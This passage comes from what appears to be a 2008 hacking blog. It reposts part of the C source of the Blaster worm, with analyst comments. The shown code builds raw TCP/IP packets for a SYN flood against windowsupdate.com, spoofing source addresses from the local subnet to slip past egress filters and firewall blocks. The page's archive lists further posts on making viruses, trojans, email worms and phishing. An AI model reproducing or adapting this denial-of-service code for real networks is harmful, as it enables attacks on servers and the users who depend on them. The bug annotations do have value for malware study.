unsigned long result = 0;

while (length > 1) {

result += *(buf++);

length -= sizeof(*buf);

}

if (length) result += *(unsigned char*)buf;

result = (result >> 16) + (result & 0xFFFF);

result += (result >> 16);

result = (~result)&0xFFFF;

return (int)result;

}

/*

* This is a function that uses "raw-sockets" in order to send

* a SYNflood at the victim, which is "windowsupdate.com" in

* the case of the Blaster worm.

*/

void blaster_send_syn_packet(int target_ip, int fd)

{

struct IPHDR

{

unsigned char verlen; /*IP version & length */

unsigned char tos; /*IP type of service*/

unsigned short totallength;/*Total length*/

unsigned short id; /*Unique identifier */

unsigned short offset; /*Fragment offset field*/

unsigned char ttl; /*Time to live*/

unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/

unsigned short checksum; /*IP checksum*/

unsigned int srcaddr; /*Source address*/

unsigned int dstaddr; /*Destination address*/

};

struct TCPHDR

{

unsigned short srcport;

unsigned short dstport;

unsigned int seqno;

unsigned int ackno;

unsigned char offset;

unsigned char flags;

unsigned short window;

unsigned short checksum;

unsigned short urgptr;

};

struct PSEUDO

{

unsigned int srcaddr;

unsigned int dstaddr;

unsigned char padzero;

unsigned char protocol;

unsigned short tcplength;

};

struct PSEUDOTCP

{

unsigned int srcaddr;

unsigned int dstaddr;

unsigned char padzero;

unsigned char protocol;

unsigned short tcplength;

struct TCPHDR tcphdr;

};

char spoofed_src_ip[16];

unsigned short target_port = 80; /*SYNflood web servers*/

struct sockaddr_in to;

struct PSEUDO pseudo;

char buf[60] = {0};

struct TCPHDR tcp;

struct IPHDR ip;

int source_ip;

/* Yet another randomizer-seeding */

srand(GetTickCount());

/* Generate a spoofed source address that is local to the

* current Class B subnet. This is pretty smart of Buford.

* Using just a single IP address allows defenders to turn

* it off on the firewall, whereas choosing a completely

* random IP address would get blocked by egress filters

* (because the source IP would not be in the proper range).

* Randomly choosing nearby IP addresses it probably the

* best way to evade defenses */

sprintf(spoofed_src_ip, "%i.%i.%i.%i",

local_class_a, local_class_b, rand()%255, rand()%255);

source_ip = blaster_resolve_ip(spoofed_src_ip);

/* Build the sockaddr_in structure. Normally, this is what

* the underlying TCP/IP stack uses to build the headers

* from. However, since the DoS attack creates its own

* headers, this step is largely redundent. */

to.sin_family = AF_INET;

to.sin_port = htons(target_port); /*this makes no sense */

to.sin_addr.s_addr = target_ip;

/* Create the IP header */

ip.verlen = 0x45;

ip.totallength = htons(sizeof(ip) + sizeof(tcp));

ip.id = 1;

ip.offset = 0;

ip.ttl = 128;

ip.protocol = IPPROTO_TCP;

ip.checksum = 0; /*for now, set to true value below */

ip.dstaddr = target_ip;

/* Create the TCP header */

tcp.dstport = htons(target_port);

tcp.ackno = 0;

tcp.offset = (unsigned char)(sizeof(tcp)<<4);

tcp.flags = 2; /*TCP_SYN*/

tcp.window = htons(0x4000);

tcp.urgptr = 0;

tcp.checksum = 0; /*for now, set to true value below */

/* Create pseudo header (which copies portions of the IP

* header for TCP checksum calculation).*/

pseudo.dstaddr = ip.dstaddr;

pseudo.padzero = 0;

pseudo.protocol = IPPROTO_TCP;

pseudo.tcplength = htons(sizeof(tcp));

/* Use the source adress chosen above that is close, but

* not the same, as the spreader's IP address */

ip.srcaddr = source_ip;

/* Choose a random source port in the range [1000-19999].*/

tcp.srcport = htons((unsigned short)((rand()%1000)+1000));

/* Choose a random sequence number to start the connection.

* BUG: Buford meant htonl(), not htons(), which means seqno

* will be 15-bits, not 32-bits, i.e. in the range

* [0-32767]. (the Windows rand() function only returns

* 15-bits). */

tcp.seqno = htons((unsigned short)((rand()<<16)|rand()));

pseudo.srcaddr = source_ip;

/* Calculate TCP checksum */

memcpy(buf, &pseudo, sizeof(pseudo));

memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp));

tcp.checksum = blaster_checksum(buf,

sizeof(pseudo)+sizeof(tcp));

memcpy(buf, &ip, sizeof(ip));

memcpy(buf+sizeof(ip), &tcp, sizeof(tcp));

/* I have no idea what's going on here. The assembly code

* zeroes out a bit of memory near the buffer. I don't know

* if it is trying to zero out a real variable that happens

* to be at the end of the buffer, or if it is trying to zero

* out part of the buffer itself. */

memset(buf+sizeof(ip)+sizeof(tcp), 0,

sizeof(buf)-sizeof(ip)-sizeof(tcp));

/* Major bug here: the worm writer incorrectly calculates the

* IP checksum over the entire packet. This is incorrect --

* the IP checksum is just for the IP header itself, not for

* the TCP header or data. However, Windows fixes the checksum

* anyway, so the bug doesn't appear in the actual packets

* themselves.

*/

ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp));

/* Copy the header over again. The reason for this is simply to

* copy over the checksum that was just calculated above, but

* it's easier doing this for the programmer rather than

* figuring out the exact offset where the checksum is

* located */

memcpy(buf, &ip, sizeof(ip));

/* Send the packet */

sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0,

(struct sockaddr*)&to, sizeof(to));

}

Friday, August 15, 2008

worm source code...

Books for hacking

Art of pishing

Notepad,funny trick

windows,hacking tips

Spider hacking

Hacking in Linux

CHANGE ADMINISTRATOR password

Monday, August 4, 2008

How to increase the power of ur pc

Make ur own virus torzan

CD-ROM virus

Sunday, August 3, 2008

Remove ur NTDLR

Thursday, July 31, 2008

VBScript Worm

MATRIX WORM

E-mail Worms

Atom bomb virus in c

Wednesday, July 30, 2008

chinese virus

A GodDamn Virus code

C++ worm, the source code of the blaster worm

Viruses

Blog Archive

About Me

Friday, August 15, 2008

Monday, August 4, 2008

Sunday, August 3, 2008

Thursday, July 31, 2008

Wednesday, July 30, 2008

Subscribe To

Blog Archive

About Me